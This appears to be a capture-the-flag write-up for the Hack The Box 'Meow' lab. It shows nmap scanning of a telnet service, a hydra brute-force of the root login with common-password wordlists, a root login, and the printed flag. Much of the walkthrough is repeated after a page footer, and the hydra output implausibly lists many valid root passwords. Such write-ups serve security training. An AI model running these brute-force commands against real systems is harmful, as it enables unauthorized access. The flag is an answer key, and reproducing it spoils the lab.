01.MEOW (TELNET)

Telnet, Protocols, Reconnaissance, Weak Credentials, Misconfiguration

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ nmap -sV -T4 10.129.201.145 -p-
 PORT     STATE SERVICE       VERSION
 23/tcp   open  telnet        Linux telnetd

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 10.129.201.145 -p 23
 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln 10.129.201.145 -p 23
 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 23
    - e.g., weak Telnet configurations, or known vulnerabilities in the Telnet 
      service
       - if no results are found then the service may be fully patched!

FOOTHOLD

Submit root flag

#BRUTE FORCE USERNAME & PASSWORD
root@htb:~$ locate username
 /usr/share/seclists/Usernames/top-usernames-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Usernames/top-usernames-shortlist.txt .

root@htb:~$ locate password
 /usr/share/seclists/Passwords/Common-Credentials/top-passwords-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Passwords/Common-Credentials/top-passwords-shortlist.txt .

root@htb:~$ hydra -L top-usernames-shortlist.txt -P top-passwords-shortlist.txt 10.129.201.145 telnet
 [23][telnet] host: 10.129.201.145   login: root   password: dragon
 [23][telnet] host: 10.129.201.145   login: root   password: querty
 [23][telnet] host: 10.129.201.145   login: root   password: master
 [23][telnet] host: 10.129.201.145   login: root   password: 1234567
 [23][telnet] host: 10.129.201.145   login: root   password: trustno1
 [23][telnet] host: 10.129.201.145   login: root   password: letmein
 [23][telnet] host: 10.129.201.145   login: root   password: 111111
 [23][telnet] host: 10.129.201.145   login: root   password: abc123
 [23][telnet] host: 10.129.201.145   login: root   password: iloveyou
 [23][telnet] host: 10.129.201.145   login: root   password: monkey
 [23][telnet] host: 10.129.201.145   login: root   password: 123456
 [23][telnet] host: 10.129.201.145   login: root   password: 12345678
 [23][telnet] host: 10.129.201.145   login: root   password: password
 [23][telnet] host: 10.129.201.145   login: root   password: sunshine
 [23][telnet] host: 10.129.201.145   login: root   password: baseball
 [23][telnet] host: 10.129.201.145   login: root   password: 123123

root@htb:~$ telnet {targetIP/domain}
 Meow login: root

root@Meow:~# ls
 flag.txt  snap

root@Meow:~# cat flag.txt
 b40abdfe23665f766f9c61ecba8a4c19

PreviousTIER 0 Next02.FAWN (FTP)

Last updated 3 months ago

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 10.129.201.145 -p 23
 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln 10.129.201.145 -p 23
 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 23
    - e.g., weak Telnet configurations, or known vulnerabilities in the Telnet 
      service
       - if no results are found then the service may be fully patched!

FOOTHOLD

Submit root flag

#BRUTE FORCE USERNAME & PASSWORD
root@htb:~$ locate username
 /usr/share/seclists/Usernames/top-usernames-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Usernames/top-usernames-shortlist.txt .

root@htb:~$ locate password
 /usr/share/seclists/Passwords/Common-Credentials/top-passwords-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Passwords/Common-Credentials/top-passwords-shortlist.txt .

root@htb:~$ hydra -L top-usernames-shortlist.txt -P top-passwords-shortlist.txt 10.129.201.145 telnet
 [23][telnet] host: 10.129.201.145   login: root   password: dragon
 [23][telnet] host: 10.129.201.145   login: root   password: querty
 [23][telnet] host: 10.129.201.145   login: root   password: master
 [23][telnet] host: 10.129.201.145   login: root   password: 1234567
 [23][telnet] host: 10.129.201.145   login: root   password: trustno1
 [23][telnet] host: 10.129.201.145   login: root   password: letmein
 [23][telnet] host: 10.129.201.145   login: root   password: 111111
 [23][telnet] host: 10.129.201.145   login: root   password: abc123
 [23][telnet] host: 10.129.201.145   login: root   password: iloveyou
 [23][telnet] host: 10.129.201.145   login: root   password: monkey
 [23][telnet] host: 10.129.201.145   login: root   password: 123456
 [23][telnet] host: 10.129.201.145   login: root   password: 12345678
 [23][telnet] host: 10.129.201.145   login: root   password: password
 [23][telnet] host: 10.129.201.145   login: root   password: sunshine
 [23][telnet] host: 10.129.201.145   login: root   password: baseball
 [23][telnet] host: 10.129.201.145   login: root   password: 123123

root@htb:~$ telnet {targetIP/domain}
 Meow login: root

root@Meow:~# ls
 flag.txt  snap

root@Meow:~# cat flag.txt
 b40abdfe23665f766f9c61ecba8a4c19